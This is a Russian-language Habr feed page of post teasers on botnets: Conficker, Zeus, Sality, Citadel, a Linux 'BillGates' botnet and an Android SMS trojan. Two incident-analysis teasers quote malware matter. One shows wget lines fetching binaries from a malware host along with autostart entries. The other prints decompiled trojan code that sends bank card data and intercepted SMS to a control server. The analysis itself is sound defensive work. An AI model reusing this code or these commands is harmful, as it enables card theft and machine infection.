Pull to refresh
  • by relevance
  • by date
  • by rating

Neverending story

Information Security *
По просьбе FkSD, ибо у него не хватает кармы.

Сегодня ночью ботнет Kido начал работать. Событие, ожидавшееся экспертами, еще с 1 апреля – произошло.

Комьютеры, зараженные Trojan-Downloader.Win32.Kido (aka Conficker.C), взаимодействуя друг с другом через P2P-соединения, дали команду зараженным машинам на загрузку новых файлов.
Новый вариант Kido (Net-Worm.Win32.Kido.js) – значительно отличается от предыдущей версий и имеет два важных отличия – это снова червь и он будет работать только до 3 мая 2009 года. Более детальный анализ его функционала проводится в настоящее время.
Кроме обновления самого себя Kido загрузил на зараженные компьютеры новые файлы и это самое интересное в этой истории.
Читать дальше →
Total votes 70: ↑64 and ↓6 +58
Views 589
Comments 53

iBotnet — справедливое название первого ботнета под Mac Os X

Lumber room
image Обнаружен первый ботнет, компьютеры которого работают под управлением операционной системы Apple Mac OS X, сообщает eWeek со ссылкой на данные компании Symantec, занимающейся компьютерной безопасностью.
Эта сеть зомбированных компьютеров получила название iBotnet. Ее формирование началось пару месяцев назад.

В iBotnet входят компьютеры, зараженные трояном OSX.iServices. Он распространяется под видом программы, снимающей защиту с Photoshop CS4 и iWork'09.

По оценке Symantec, в настоящее время в iBotnet входит несколько тысяч компьютеров. Они уже использовались для проведения DDoS-атак. Не исключено, что iBotnet будет задействован при рассылке спама.

Троян OSX.iServices был обнаружен в январе 2009 года. По оценке компании Intego, занимающейся разработкой антивирусных программ для компьютеров Apple, вместе с пиратскими iWork'09 и Photoshop CS4 этот троян попал на 20 тысяч компьютеров, работающих под управлением Mac OS X.
Total votes 38: ↑20 and ↓18 +2
Views 236
Comments 29

Хостер в ответе за тех, кого приручил?

Hosting
Сегодня целый день читаю форумы, в которых обсуждается горячая тема последних дней: «3FN Blackout». Эта же тема пробежала и на страницах хабрасообщества.

Меня эта проблема задела самым непосредственным образом — недоступны десятки сайтов (моих и партнёрских), не работает почта, потеряны материалы, созданные с момента последнего внешнего бэкапа, идут неустойки за рекламу, потеряны деньги по предоплате и срочно нужно найти на оплату у другого хостера плюс время на переезд.

Судя по прочитанным материалам, складывается ощущение, что рады такому развитию событий только те, у кого не было аккаунта на 3FN. Это больше похоже на смесь позиций «моя хата с краю» и «пусть у конкурента соседа корова сдохнет». Как некрасиво, а? А вот вы, умничающие сограждане, уверены что на 3FN «жили» исключительно спаммеры, вирусописатели и педофилы? А вы не задумывались что из более чем 15000 клиентов, большая часть вела вполне легальную деятельность и размещала контент, отвечающий американскому и международному законодательству? Я, и многие мои партнёры, выбрали этого хостера за быстрые сервера и грамотный саппорт. После украинских и российских хостеров, на 3FN мои сайты просто летали. За более чем год размещения — 15 минут разового простоя, связанного с падением жёсткого диска, сопровождаемые вежливыми извинениями саппорта в аське.
Читать дальше →
Total votes 134: ↑113 and ↓21 +92
Views 1.2K
Comments 87

Распространение троянов через flash баннеры

Information Security *
Внимание: будьте бдительны при размещении flash баннеров!

Предыстория.
Я владелец довольно популярного ресурса. Некоторое время назад было несколько обращений с просьбой разместить «не приносящие никакого вреда iframe». От таких предложений отказывались, ибо карма важнее.)

Вчера обратился человек, с предложением разместить небольшой flash баннер, c рекламой БМВ-клуба. Код оказался с неприятным троянским «бонусом».
UPD!: отписался в поддержку Яндекса. Ответили. Поблагодарили и уведомили, что код отослан на анализ в соответствующий отдел. mini victory?)
остальные UPDs под катом
подробности...
Total votes 135: ↑124 and ↓11 +113
Views 2.3K
Comments 74

Торренты, скайп и безопасность

Information Security *
Дисклаймер: все нижесказанное — мои личные мысли, не ставящие целью дискредитировать упомянутые системы и их производителей.

Коротенько о себе: я занимаюсь сетевой безопасностью. 8 лет. Специализируюсь на cisco (CCIE Security).

Я сам настороженно отношусь к обоим системам (Торрент, Скайп). Но все никак не мог сформулировать, что же мне так не нравится. И вот сейчас я попробую по возможности объективно рассказать, что же меня тревожит.

Но для начала я напомню уважаемым хабрачитателям, что такое ботнет, с чем его едят и почему он так опасен.

Ботнет — объединение разрозенных компьютеров, находящихся под одним вредоносным управлением. Ботнеты делятся на активные и пассивные. Компьютеры в активном ботнете знают, что ими удаленно управляют. В пассивном — нет.

Как же компьютеры попадают в ботнет? Как правило, для этого используются трояны (устанавливаешь на компьютер одно, а параллельно тебе ставится незаказанное), рассылаемые с почтой, черви (самораспространяющийся по сети вредоносный код), программы на самозапускающихся флешках и т.д. Главная задача — установить на компьютер программу, которая будет «стучаться» (пытаться соединиться) изнутри межсетевого экрана наружу на хосты управления (call-home). Как только зараженный компьютер достукивается до сервера управления, по установленной сессии им можно поуправлять.
Читать дальше →
Total votes 237: ↑149 and ↓88 +61
Views 9.1K
Comments 222

Полиция Испании арестовала зачинщиков массивного бот-нета

Information Security *
Как сообщает BBC, полиция Испании поймала троих зачинщиков бот-нета Mariposa. По оценкам бот-нет состоит из 13 миллионов зараженных машин, на территории около 190 стран. Заражённые машины принадлежат более чем половине компаний из списка Fortune 1000, а также порядка 40 крупным банкам.

Хозяева бот-нета являются гражданами Испании, ранее не привлекавшимися к судебной ответственности за кибер-преступления. Первого из них поймали в феврале, когда он управлял бот-нетом не утрудившись замаскировать свой настоящий адрес. Материалы из его копьютера навели следователей на остальных владельцев.

Возможно последуют и другие аресты.
Total votes 8: ↑7 and ↓1 +6
Views 526
Comments 2

Yota, Dlink или скрытый BotNet?

Information Security *Network technologies *
Sandbox
Началось все 1 месяц назад. Клиенты нашей компании стали испытывать проблему при доступе в интернет. Проблема проявляется только у клиентов использующих роутеры и приставки STB. В течение дня, в разное время на оборудование были зафиксированы всплески активности продолжительностью 5-10 минут. Всплески могли происходит в любое время суток утром днем и вечером. Пример такого всплеска я покажу.

image
Читать дальше →
Total votes 85: ↑81 and ↓4 +77
Views 3.9K
Comments 46

Carberp, Facebook и ddos.plug

ESET NOD32 corporate blog
Про Carberp мы уже писали ни раз, но тут опять граждане отличились интересной активностью. Во-первых, на прошлой неделе была замечена аналитиками из Trusteer интересная вещь, что с определенной конфигурацией Carberp стал вымогать деньги у зараженных пользователей за вход в Facebook.

image

И причем, очень настойчиво требовал оплату в размере 20 Euro через Ukash:

image

Были мысли, что быть может новая модификация какая, но нет, только специальный конфигурационный файл, содержащий инжекты для Facebook. Выглядит этот конфигурационный файл так:

image

Причем данная модификация не использовала буткит функционал, но могла устанавливать его по запросу. При анализе модуля внедряемого в системные процессы стало понятно, что код этой библиотеки практически идентичен той, которая поставлялась сразу с буткитом. Немного смутила нас эта Facebook- активность, ведь раньше большой любви к зарубежным сервисам и банкам Carberp не питал. Но тем не менее, ранее были замечены атаки на следующие зарубежные банки: Bank of America, CityBank, HSBC, CHASE, Nordea. Возможно это далеко не все, но по крайней мере то, что лично видели в конфигах, и запомнилось. После продолжения анализа ситуации возникла идея, а не изменил ли свой вектор распространения Carberp за последнее время. Вот статистика по обнаружениям в нашем регионе:

image

Как видно из вышеприведенных данных, пиковым месяцем в прошлом году был декабрь, но январь не сдает своих позиций (с учетом того, что данные приведены на начало этой недели). Видимо, связка Carberp + Blackhole по-прежнему очень эффективна. С точки зрения регионализации наш регион только усилил свою долю по количеству инцидентов:
Читать дальше →
Total votes 22: ↑17 and ↓5 +12
Views 6.4K
Comments 5

Твиттер-боты создают события в международном масштабе

Information Security *

Когда Greg Marra (на снимке) построил твиттер-бот @Trackgirl в 2008 году, он просто хотел проверить, сможет ли скрипт на Python проникнуть в социальную сеть реальных людей. Он не ожидал, что люди действительно будут беспокоиться за @Trackgirl, слать ей прямые собщения и интересоваться самочувствием после ее вымышленной травмы.

@Trackgirl отслеживала поток твитов с популярными в данный момент хештэгами, и публиковала их от своего имени. Три раза в день она фолловила 5 человек. Получалось, что она связана с правильными людьми, и другие люди стали фолловить ее, считая, что ее копипасты о беге на длинные дистанции исходили от живого человека. Однажды она твитнула о том, что повредила колено… Тысячи людей интересовались самочувствием скрипта и искренне сопереживали боту.
Читать дальше →
Total votes 94: ↑80 and ↓14 +66
Views 4.6K
Comments 60

Что вы знаете о Sality?

Information Security *
Sality — одно из наиболее известных семейств вредоносного программного обеспечения. В своем развитии ВПО Sality прошло несколько стадий.
Первое упоминание о нем датируется июлем 2003 года. В своей первоначальной версии Sality заражал исполняемые файлы путем добавления своего кода, упакованного с помощью UPX. В качестве полезной нагрузки выступал кейлоггер, перехваченные данные отсылались по протоколу SMTP на один из серверов, размещенных в России. Название является производной от английского названия города — «Salavat City» (Салават, Республика Башкортостан). Предположительно прозвище разработчика — Sector — дало название в классификации компании Dr.Web. На тот момент Sality не представлял интереса в техническом плане, автор использовал довольно примитивные механизмы — файловый инфектор был относительно простым по сравнению с другими образцами ВПО того времени, адрес SMTP сервера был жестко задан внутри кода и не мог быть изменен, так же не могла быть изменена полезная нагрузка.
С 2004 по 2008 год автор много работал над усовершенствованием Sality. Значительно изменилась методика инфицирования, а вирус стал полиморфным без изменения точки входа (техника entry-point obscuring), затрудняя тем самым процесс обнаружения и лечения. Вредоносные функции были выделены в отдельные модули, которые могли дополнительно загружаться с ряда URL-адресов, жестко прописанных в коде. Также были включены процедуры противодействия механизмам защиты: блокировка или отключение некоторых межсетевых экранов, утилит и антивирусных программ. Начиная с 2008 года (возможно, конца 2007) автор кардинально изменил схему распространения, вместо заранее заданных адресов, которые могли быть легко заблокированы антивирусными компаниями, был реализован механизм peer-to-peer обновления модулей и загрузки сторонних вредоносных программ для последующего запуска.
Читать дальше →
Total votes 75: ↑62 and ↓13 +49
Views 48K
Comments 11

Conficker — из пушки по воробьям

Information Security *
Conficker — семейство вредоносного программного обеспечения, относящегося к категории червей. Conficker — название, наиболее часто употребляемое в прессе и образованное путем перестановки частей домена trafficconverter.biz, к которому обращалась первая версия ВПО, согласно другой версии название образовано от английского слова configuration и немецкого слова ficker (синоним английского fucker). Среди зарубежных антивирусных компаний используется название Downadup, а так же Kido в классификации Kaspersky Lab. Первые образцы были обнаружены в ноябре 2008 года. По состоянию на январь 2009 было поражено около 9 миллионов компьютеров во всём мире. Столь большое число обусловлено использованием для своего автоматического распространения уязвимости службы Server операционной системы Microsoft Windows MS08-067. Следует отметить, что на момент распространения компания Microsoft уже выпустила обновление безопасности, устраняющую данную уязвимость. Однако тот факт, что обычные пользователи, как правило, не уделяют должного внимания механизму постоянного обновления операционной системы (в том числе из-за использования «пиратских» копий), сыграл немаловажную роль. К сожалению, в очередной раз на практике было продемонстрировано пренебрежительное отношение к вопросам компьютерной безопасности. В апреле 2009 года размер ботсети оценивался в 3.5 миллиона.
Существует пять основных модификаций Conficker, обозначаемых буквами A (21 ноября 2008), B (29 декабря 2008), C (20 февраля 2009), D (4 марта 2009), E (7 апреля 2009). В терминологии некоторых антивирусных компаний используется наименования A, B, B++, C, D соответственно.
Читать дальше →
Total votes 100: ↑85 and ↓15 +70
Views 39K
Comments 41

Эволюция Zeus. Part I

Information Security *

Intro


Бот Zeus, пожалуй, один из самых известных представителей вредоносного программного обеспечения. Zeus ведет свою историю с 2007 (или даже 2006) года. Многие ошибочно полагают, что Zeus — просто очередной троян, однако это не так. В действительности, Zeus представляет собой образец так называемого crimeware — программного обеспечения, предназначенного для совершения противоправных действий. В данном случае основное предназначение crimeware Zeus — кража учетных данных, используемых для проведения финансовых операций. По информации аналитиков, он отвечает за 90 % случаев банковского мошенничества в мире.

Другим заблуждением является утверждение о существовании одного огромного ботнета Zeus. На самом же деле Zeus лежит в основе очень большого числа – вероятно, нескольких сотен – различных ботнетов, и все они контролируются разными группировками киберпреступников. Создатели Zeus просто продают его заинтересованным лицам, а они уже с его помощью формируют собственные ботнеты. Таким образом, правильно говорить не о ботнете Zeus, а о ботнетах, созданных при помощи Zeus. Для отслеживания информации о командных серверах Zeus в феврале 2009 года Роман Хюсси (Roman Hussy), швейцарский специалист по компьютерной безопасности, создал сайт ZeusTracker.
Читать дальше →
Total votes 88: ↑83 and ↓5 +78
Views 38K
Comments 47

Эволюция Zeus. Part II

Information Security *
Начало здесь.

Файловый инфектор


Идея заражения файлов получила свое развитие во вредоносной программе PE_LICAT, обнаруженной Trend Micro в октябре 2010 года. PE_LICAT представляет собой продвинутый дроппер Zeus, его основная функция — загрузка и запуск новых файлов Zeus с удаленных серверов. В исполняемые файлы внедряется 1771 байт вредоносного кода. PE_LICAT использует те же механизмы, что и в Zeus 2.1.0.10 — DGA с идентичным алгоритмом и процедуру проверки подписи загружаемого файла. Подробное описание DGA приведено в отчете Trend Micro «File-Patching ZBOT Variants» pdf, eng).

Вкратце — в DGA используется функция создания хэша из Windows Crypto API. Список доменов формировался при запуске по специальному алгоритму путем хэширования текущей даты и минуты (час не использовался). Кстати, во многих источниках ошибочно пишут то 800, то 1020 уникальных доменов (эти константы действительно используются в алгоритме). На самом деле их было всего 60 в день (минуты умножались на 17 и брался остаток от деления на 1020, 1020/17=60). Хэши переводились в ASCII коды и к ним добавлялись префиксы доменов верхнего уровня .biz, .info, .org, .com, .net, а также строка /forum. Следует отметить, что PE_LICAT не является вирусом в прямом смысле этого слова (как его классифицирует Kaspersky Lab) — он не способен самостоятельно заражать файлы. Запуск процедуры заражения файлов инициирует Zeus из семейства 2.1, получивший название TSPY_ZBOT.BYZ в классификации Trend Micro.
Читать дальше →
Total votes 66: ↑59 and ↓7 +52
Views 26K
Comments 18

Microsoft приступили к операции против преступной схемы Citadel

ESET NOD32 corporate blog Information Security *
Подразделение Microsoft по борьбе с киберпреступлениями Microsoft Digital Crimes Unit объявили о начавшейся операции против ботнетов Citadel и связанной с ними киберпреступной группой. Спецоперация также включает в себя кампанию по очистке зараженных этой троянской программой компьютеров. Операция носит кодовое название b54 и осуществляется компанией совместно с ФБР, провайдерами ISP и различными командами CERT по всему миру. Целью является сорвать (disrupt) скоординированные действия ботнетов и злоумышленников, которые получают из них финансовую выгоду. После получения соответствующего ордера, компания выполнила специальную операцию по выведению из строя более 1,400 действующих ботнетов Citadel, которая включала в себя физическое изъятие серверов инфраструктуры. Отмечается, что прибыль киберпреступников, использующих Citadel, составляет более полумиллиарда долларов, которые были украдены со счетов различных организаций и частных лиц с использованием троянской программы Citadel. Пострадали около 5 млн. человек, особенно подверженными деятельности вредоносного кода оказались США, страны Европы, Гонконг, Сингапур, Индия и Австралия.

Читать дальше →
Total votes 37: ↑30 and ↓7 +23
Views 16K
Comments 16

b54 неделю спустя

ESET NOD32 corporate blog
Более недели назад Microsoft объявили о начале операции b54, направленной на выведение из строя ботнетов, построенных с использованием вредоносного кода Citadel. Операция, главным образом, преследует цель разрушения налаженной схемы по извлечению денежной прибыли из этих ботнетов злоумышленниками. Кроме этого, она включает в себя действия по очистке компьютеров от вредоносного кода ботов, совместно с ISP.

В рамках этой операции Microsoft выложили в открытый доступ материалы гражданских исков к John Doe (ответчики, точная личность которых пока не установлена). В одном из документов указаны предписания, согласно которым должна протекать эта операция. Ее суть сводится не к тотальному демонтажу управляющих серверов различных ботнетов (Citadel позволяет задавать конфигурации билдера таким образом, что каждый пользователь crimeware toolkit получает в распоряжение собственный ботнет из ботов, которые были созданы этим билдером), а к переориентированию ботнета таким образом, чтобы он не позволял злоумышленникам получать контроль над уже зараженной системой. Такая схема достигается с использованием приема перезаписи части контактной информации о доменах, к которым обращается бот Citadel (C&C) со стороны регистратора этих доменов.

Читать дальше →
Total votes 24: ↑20 and ↓4 +16
Views 7.5K
Comments 5

Ботнеты на основе TOR

ESET NOD32 corporate blog Information Security *
Ботнеты, использующие возможности анонимной сети TOR, не являются чем-то принципиально новым и уже обсуждались несолько лет назад на конференции Defcon 18 («Resilient Botnet Command and Control with Tor»). В прошлом году мы смогли подтвердить некоторые интересные факты, касающиеся использования этих идей в настоящих ботнетах используемых злоумышленниками. Эта тема уже обсуждалась в начале 2013 г. в блоге Rapid7 («Skynet, a Tor-powered botnet straight from Reddit»). В начале июля ресерчер Данчо Данчев опубликовал информацию о командных серверах C&C руткита, использующего TOR.

Этим летом мы отмечали рост ботнетов, которые используют TOR. В июле было обнаружено два различных семейства вредоносных программ, использующих скрытый протокол сервиса TOR для взаимодействия с командным C&C сервером. Такой сервис хорошо подходит при организации скрытого канала связи, но в то же время является довольно медленным способом кражи больших объемов данных с зараженного компьютера. Для киберпреступников этот путь использования скрытой службы протокола общения с C&C является предпочитетельным при получении обновлений о данных конфигурации или загрузки дополнительных вредоносных модулей.

Читать дальше →
Total votes 40: ↑38 and ↓2 +36
Views 20K
Comments 9

Исследуем Linux Botnet «BillGates»

Information Security *Reverse engineering *
image

Написал мне вчера lfatal1ty, говорит, домашний роутер на x86 с CentOS как-то странно себя ведет, грузит канал под гигабит, и какой-то странный процесс «atddd» загружает процессор. Решил я залезть и посмотреть, что же там творится, и сразу понял, что кто-то пробрался на сервер и совершает с ним непотребства всякие. В процессах висели wget-ы на домен dgnfd564sdf.com и процессы atddd, cupsdd, cupsddh, ksapdd, kysapdd, skysapdd и xfsdxd, запущенные из /etc:
Скрытый текст
root      4741  0.0  0.0  41576  2264 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/sksapd
root      4753  0.0  0.0  41576  2268 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/xfsdx
root      4756  0.0  0.0  41576  2264 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/cupsdd
root      4757  0.0  0.0  41576  2268 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/kysapd
root      4760  0.0  0.0  41576  2264 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/ksapd
root      4764  0.0  0.0  41576  2268 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/atdd
root      4767  0.0  0.0  41576  2264 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/skysapd

К сожалению, процессы не додумался скопировать

Начальный анализ


Сначала я полез смотреть, что же вообще происходит и насколько серьезно была скомпрометирована система. Первое, что мне пришло в голову проверить — /etc/rc.local. Там было следующее:
cd /etc;./ksapdd
cd /etc;./kysapdd
cd /etc;./atddd
cd /etc;./ksapdd
cd /etc;./skysapdd
cd /etc;./xfsdxd

«Хмм, ладно», подумал я. Полез в root'овский crontab
Читать дальше →
Total votes 150: ↑145 and ↓5 +140
Views 86K
Comments 72

«BillGates» Linux Botnet — откуда же он взялся?

Information Security *
Sandbox
image

Буквально вчера читал статью ValdikSS «Linux Botnet «BillGates»» и после прочтения захотелось рассказать, откуда он взялся.

Отступление

На днях начальница пригнала своего сынишку поучиться уму-разуму, а так как дарование впервые видит серверную ОС, то решение учить пацана выпало на старый ubunt-овский сервер с LAMP-ом на борту (Linux + Apache + MySQL + PHP). Благо на нем тестируют проекты перед показом в свет.

После вводных лекций и кучи выданной макулатуры на сервере был создан новый недо юзер, который благополучно был добавлен к зоопарку SSH, и присвоен стандартный пароль в виде «Thispasswordiscrypt». В процессе обучения недоюзеру надоело вводить длинный пароль и он без ведома сменил его на «fack_off». В то время мы проходили бэкапы БД и выборочно сервера, но по каким-то богу известным причинам под его учеткой не завелось восстановление БД. Не сильно парясь, я добавил ему повышенные привилегии. Теперь все ОК, начальница в ажуре. Так как мама рядом, и курить нельзя, то на перекур хожу только я, а он грызет гранит науки.
Читать дальше →
Total votes 52: ↑34 and ↓18 +16
Views 22K
Comments 28

Кого атакует BillGates?

Information Security *Reverse engineering *
image

Похоже, ботнет BillGates распространяется все больше и больше — уже 4 знакомых человека обратились ко мне с вопросами, как от него избавиться, и что это такое.
Мне удалось заполучить свежую версию, которая нормально работала на моей системе (получала команды с сервера и DOS-ила), и это весело!

Что изменилось?


Модуль «Gates» теперь состоит из 2 модулей: «Beikong» и «Monitor (moni)». Если он запускается по пути /usr/bin/pojie (в моем случае), то запускается moni, если же по какому-то другому пути, то Beikong. Beikong, по сути, является хренотенью, которая переконфигурирует и обновляет другие модули, а moni отслеживает состояние всех модулей (и перезапускает их в случае необходимости), собирает с них статистику и отправляет ее на сервер через Beikong. Если /usr/bin/pojie не существует, то Beikong скопирует себя туда и запустит.

image
Читать дальше →
Total votes 110: ↑99 and ↓11 +88
Views 46K
Comments 19

Как я позорно деактивировал ботнет

Information Security *
image

Разместил я, ничего не подозревая, объявление на avito.ru. Сколько раз туда ходил! Но на этот раз как-то не удалось…
Я давно был уверен, что многие нехорошие люди парсят телефонные номера с этого сайта, так что такси, строительные материалы, скорая компьютерная помощь, «8-800-555-3-555 — проще позвонить, чем у кого-то занимать» и приглашения на битву экстрасенсов для меня уже привычное дело, но на этот раз было нечто новое.

Приходит мне СМС-сообщение с текстом: «Зaинтерсoвaлo вaше oбьявление кaк нaсчет oбменa нa http://…». Прямо вот так, с пропущенным знаком препинания и ошибками. А по ссылке качается avito.apk. Интересно.

Исследование APK


Ну, подумал я, надо бы глянуть, что этот APK делает. Результат привычной для меня связки из apktool + dex2jar + jd-gui меня не удовлетворил, т.к. не было видно часть классов деревом, хотя доступ по ссылкам к ним получить было можно. Решил я воспользоваться новомодными онлайн-sandbox'ами — и декомпилированный код получил, и информацию, и pcap-файл со сдампленным трафиком. Как оказалось, этот файл загружали до меня, поэтому в мои руки попал более ранний анализ, что было достаточно полезно.

Итак, что умеет этот троян:
  • delivery&&& — рассылка СМС-сообщений на номера из телефонной книги с заданным текстом
  • sent&&& — отправка заданных СМС-сообщений с сервера
  • rent&&& — перехват всех СМС-сообщений и отправка их на сервер
  • sms_stop&&& — отмена перехвата СМС-сообщений
  • ussd&&& — USSD-запрос
  • call_1&&& — установка и отмена безусловной переадресации

Немного кода из моих заметок
protected HttpRequestBase a()
    {
        try
        {
            HttpPost httppost = new HttpPost(d());
            ArrayList arraylist = new ArrayList();
            arraylist.add(new BasicNameValuePair("bot_id", com.avito.a.c.a(c())));
            arraylist.add(new BasicNameValuePair("number", b));
            arraylist.add(new BasicNameValuePair("month", Integer.toString(c.intValue())));
            arraylist.add(new BasicNameValuePair("year", Integer.toString(d.intValue())));
            arraylist.add(new BasicNameValuePair("cvc", Integer.toString(e.intValue())));
            httppost.setEntity(new UrlEncodedFormEntity(arraylist, "UTF-8"));
            return httppost;
        }
        catch(UnsupportedEncodingException unsupportedencodingexception)
        {
            unsupportedencodingexception.printStackTrace();
        }
        return null;
    }

    protected String d()
    {
        return new String((new StringBuilder()).append(a).append("set_card.php").toString());
    }






    protected HttpRequestBase a()
    {
        try
        {
            HttpPost httppost = new HttpPost(d());
            ArrayList arraylist = new ArrayList();
            arraylist.add(new BasicNameValuePair("id", com.avito.a.c.a(b)));
            arraylist.add(new BasicNameValuePair("info", com.avito.a.c.b(b)));
            httppost.setEntity(new UrlEncodedFormEntity(arraylist, "UTF-8"));
            return httppost;
        }
        catch(UnsupportedEncodingException unsupportedencodingexception)
        {
            unsupportedencodingexception.printStackTrace();
        }
        return null;
    }

    protected String d()
    {
        return new String((new StringBuilder()).append(a).append("get.php").toString());
    }




    protected HttpRequestBase a()
    {
        try
        {
            JSONObject jsonobject = new JSONObject();
            jsonobject.put("text", c);
            jsonobject.put("number", d);
            jsonobject.put("date", e);
            HttpPost httppost = new HttpPost(d());
            ArrayList arraylist = new ArrayList();
            arraylist.add(new BasicNameValuePair("bot_id", com.avito.a.c.a(b)));
            arraylist.add(new BasicNameValuePair("sms", jsonobject.toString()));
            httppost.setEntity(new UrlEncodedFormEntity(arraylist, "UTF-8"));
            return httppost;
        }
        catch(UnsupportedEncodingException unsupportedencodingexception)
        {
            unsupportedencodingexception.printStackTrace();
        }
        catch(JSONException jsonexception)
        {
            jsonexception.printStackTrace();
        }
        return null;
    }

    protected String d()
    {
        return new String((new StringBuilder()).append(a).append("load_sms.php").toString());


Помимо этих команд, троян отключает Wifi Sleep, пытается получить доступ к зашифрованному хранилищу и установить себя в качестве Android-администратора (естественно, при этом используются стандартные диалоги ОС, где можно отменить данное действие). Код трояна не обфусцирован, некоторые строки закодированы base64. Вообще непонятно, что это за троян такой. То ли его собирали копипастой, то ли он основан на каком-то другом трояне, то ли еще что, но в нем имеются строки на португальском, немецком, английском, Ubuntu-шрифты, форма для перехвата данных из приложения немецкого банка Commerzbank, значок какой-то игры и флеш-плеера.
Читать дальше →
Total votes 368: ↑362 and ↓6 +356
Views 189K
Comments 143
1